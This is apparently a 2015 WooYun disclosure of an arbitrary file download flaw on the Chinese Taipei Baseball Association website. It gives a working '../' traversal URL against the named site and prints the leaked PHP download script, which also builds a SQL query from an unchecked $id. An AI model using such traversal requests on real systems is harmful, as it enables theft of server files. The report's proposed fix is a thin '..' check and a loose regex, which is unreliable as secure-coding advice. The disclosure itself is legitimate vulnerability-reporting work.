当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128144

漏洞标题:台湾棒球协会任意文件下载漏洞

相关厂商:台湾棒球协会

漏洞作者: 路人甲

提交时间:2015-07-22 15:08

修复时间:2015-09-05 17:24

公开时间:2015-09-05 17:24

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-22: 细节已通知厂商并且等待厂商处理中
2015-07-22: 厂商已经确认,细节仅向厂商公开
2015-08-01: 细节向核心白帽子及相关领域专家公开
2015-08-11: 细节向普通白帽子公开
2015-08-21: 细节向实习白帽子公开
2015-09-05: 细节向公众公开

简要描述:

详细说明:

1.http://www.ctba.org.tw/download.php下载文件时发现会导向http://www.ctba.org.tw/func_file_download.php?filename=%25E6%2597%2585%25E5%25A4%2596%25E9%2581%25B8%25E6%2589%258B%25E7%25A9%25BA%25E7%2599%25BD%25E5%258D%2594%25E8%25AD%25B0%25E6%259B%25B8%25E8%258B%25B1%25E6%2596%2587%25E7%2589%2588.doc

圖片 545.jpg


2.随意测试程序,没中http://www.ctba.org.tw/func_file_download.php?filename=func_file_download.php
3.往上一层测试,中了
http://www.ctba.org.tw/func_file_download.php?filename=../func_file_download.php

圖片 546.jpg


4.接下来就是打包外带XD

漏洞证明:

func_file_download.php的程序代码如下

<?php
// 去
$base_dir = '/home/ctba';
$base_inc_dir = '/home/ctba/include';
include("/home/ctba/include/web_basic_data.php");
include("/home/ctba/include/mysql/db_connect.php");
include("/home/ctba/include/functions/functions.inc.php");
include("/home/ctba/include/properties.inc.php");
$path = 'file';
//新闻内之下载文件
if( $file>=1 && $file<=20){
$path = 'download';
$q = "SELECT * FROM ctba.articles_data ";
$q .= "WHERE Articles_Auto_Serial = '$id' and articles_status > 0 ";
$db->query($q);
$db->next_record();
switch($file) {
case 1: $filename = $db->f("Articles_Word_File"); break;
case 2: $filename = $db->f("Articles_Word_File2"); break;
case 3: $filename = $db->f("Articles_Word_File3"); break;
case 4: $filename = $db->f("Articles_Word_File4"); break;
case 5: $filename = $db->f("Articles_Word_File5"); break;
case 6: $filename = $db->f("Articles_Word_File6"); break;
case 7: $filename = $db->f("Articles_Word_File7"); break;
case 8: $filename = $db->f("Articles_Word_File8"); break;
case 9: $filename = $db->f("Articles_Word_File9"); break;
case 10: $filename = $db->f("Articles_Word_File10"); break;
case 11: $filename = $db->f("Articles_Word_File11"); break;
case 12: $filename = $db->f("Articles_Word_File12"); break;
case 13: $filename = $db->f("Articles_Word_File13"); break;
case 14: $filename = $db->f("Articles_Word_File14"); break;
case 15: $filename = $db->f("Articles_Word_File15"); break;
case 16: $filename = $db->f("Articles_Word_File16"); break;
case 17: $filename = $db->f("Articles_Word_File17"); break;
case 18: $filename = $db->f("Articles_Word_File18"); break;
case 19: $filename = $db->f("Articles_Word_File19"); break;
case 20: $filename = $db->f("Articles_Word_File20"); break;
default: $filename = $db->f("Articles_Word_File"); break;
}
}
$real_filename = urldecode($filename) ;
$browser_agent = 'ie' ;
$real_filename = ($browser_agent == 'ie' || $browser_agent == 'opera')? mb_convert_encoding($real_filename,"BIG5","UTF-8"):$real_filename;
/*
header('Pragma: public');
header('Expires: 0');
header('Last-Modified: ' . gmdate('D, d M Y H:i ') . ' GMT');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: private', false);
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $real_filename. '";');
header('Content-Transfer-Encoding: binary');
*/
header("Content-Disposition: attachment; filename=".$real_filename."\n");
header("Content-type: application/x-download");
header("Content-Description: PHP5 Generated Data");
$fp=fopen($base_dir.$path.'/'.$filename, "r");
fpassthru($fp);
?>

修复方案:

func_file_download.php第66行有问题

$fp=fopen($base_dir.$path.'/'.$filename, "r");


所以要在65行检查$filename变量应拒绝../ ..\ 路径遍历

If(strstr($filename, '..')) return;


接者应正规化检验是否符合 文件.doc

If(!(preg_match(' /.doc$/',$filename))) return;


版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-22 17:23

厂商回复:

感謝通知!

最新状态:

暂无